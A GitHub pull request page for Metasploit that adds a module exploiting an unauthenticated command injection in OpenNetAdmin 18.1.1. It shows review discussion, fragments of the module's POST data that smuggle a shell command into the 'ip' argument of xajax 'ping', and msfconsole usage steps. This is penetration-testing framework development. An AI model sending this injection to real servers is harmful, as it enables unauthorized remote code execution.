-
Notifications
You must be signed in to change notification settings - Fork 13.8k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Add OpenNetAdmin 18.1.1 Remote Code Execution exploit #12704
Conversation
OpenNetAdmin provides a database managed inventory of your IP network. Each subnet, host, and IP can be tracked via a centralized AJAX enabled web interface that can help reduce tracking errors. This module exploits a command injection in OpenNetAdmin.
Added OpenNetAdmin 18.1.1 Exploit Documentation
end | ||
|
||
def filter_bad_chars(cmd) | ||
cmd.gsub!(/chmod \+x/, 'chmod 777') |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Would this make more sense as:
cmd.gsub!(/chmod \+x/, 'chmod 777') | |
CGI.escape cmd |
to catch all the characters?
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Is there a reason to use data
rather than vars_post
(which would automatically take care of URL encoding) ?
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
vars_post = {
'xajax' => 'window_submit',
'xajaxargs[]' => 'tooltips',
'xajaxargs[]' => 'ip%3D%3E;#{filter_bad_chars(cmd)};',
'xajaxargs[]' => 'ping'
}
warning: key "xajaxargs[]" is duplicated and overwritten
I am encountering the above error.
@bcoles
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Unfortunately I don't see a way to handle the repeated key query string paradigm in Rex (PHP will turn it into an array). I'm fine passing as a string (with the payload properly encoded), or you can add array handling to https://github.com/rapid7/metasploit-framework/blob/master/lib/rex/proto/http/client_request.rb#L138-L146. Instead of doing a val.to_s
right away, when val
is an array I would do something like:
val.each do |v|
v = v.to_s
pstr << '&' if pstr.length > 0
pstr << (opts['encode_params'] ? set_encode_uri(var) : var)
pstr << '='
pstr << (opts['encode_params'] ? set_encode_uri(v) : v)
end
Then you could pass the post data like:
vars_post = {
'xajax' => 'window_submit',
'xajaxargs[]' => ['tooltips', 'ip=>;#{cmd};', 'ping']
}
There's inconsistency with the naming convention here.
It looks like OpenNetAdmin is a typical LAMP stack style application, which should run on any UNIX system. In which case the module belongs in |
Co-Authored-By: acammack-r7 <adam_cammack@rapid7.com>
documentation/modules/exploit/linux/http/opennetadmin_ping_cmd_injection.md
Outdated
Show resolved
Hide resolved
documentation/modules/exploit/linux/http/opennetadmin_ping_cmd_injection.md
Outdated
Show resolved
Hide resolved
… to modules/exploits/unix/webapp/opennetadmin_ping_cmd_injection.rb
…in_ping_cmd_injection.md to documentation/modules/exploit/unix/webapp/opennetadmin_ping_cmd_injection.md
handle the repeated key query rapid7#12704 (comment)
Handle the repeated key query string rapid7#12704 (comment)
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Thanks for your contribution! I just have a few comments and questions before it lands.
documentation/modules/exploit/unix/webapp/opennetadmin_ping_cmd_injection.md
Outdated
Show resolved
Hide resolved
modules/exploits/unix/webapp/opennetadmin_ping_cmd_injection.rb
Outdated
Show resolved
Hide resolved
modules/exploits/unix/webapp/opennetadmin_ping_cmd_injection.rb
Outdated
Show resolved
Hide resolved
…d_injection.md Co-Authored-By: cdelafuente-r7 <56716719+cdelafuente-r7@users.noreply.github.com>
Co-Authored-By: cdelafuente-r7 <56716719+cdelafuente-r7@users.noreply.github.com>
@onurer, thanks again for this contribution! I just pushed a last commit to fix an indentation issue. Not a big deal. |
Release NotesThis module allow you to exploit a command injection vulnerability in OpenNetAdmin 18.1.1, a network management application for managing IP subnets, and remotely execute commands. You don’t need to authenticate to exploit this vulnerability. |
OpenNetAdmin provides a database managed inventory of your IP network. Each subnet, host, and IP can be tracked via a centralized AJAX enabled web interface that can help reduce tracking errors.
This module exploits a command injection in OpenNetAdmin.
Verification
Launch metasploit and set the appropiate options:
msfconsole
use exploit/linux/http/opennetadmin_ping_cmd_injection
set RHOSTS <rhosts>
set LHOST <lhost>
set VHOST <hostname>
exploit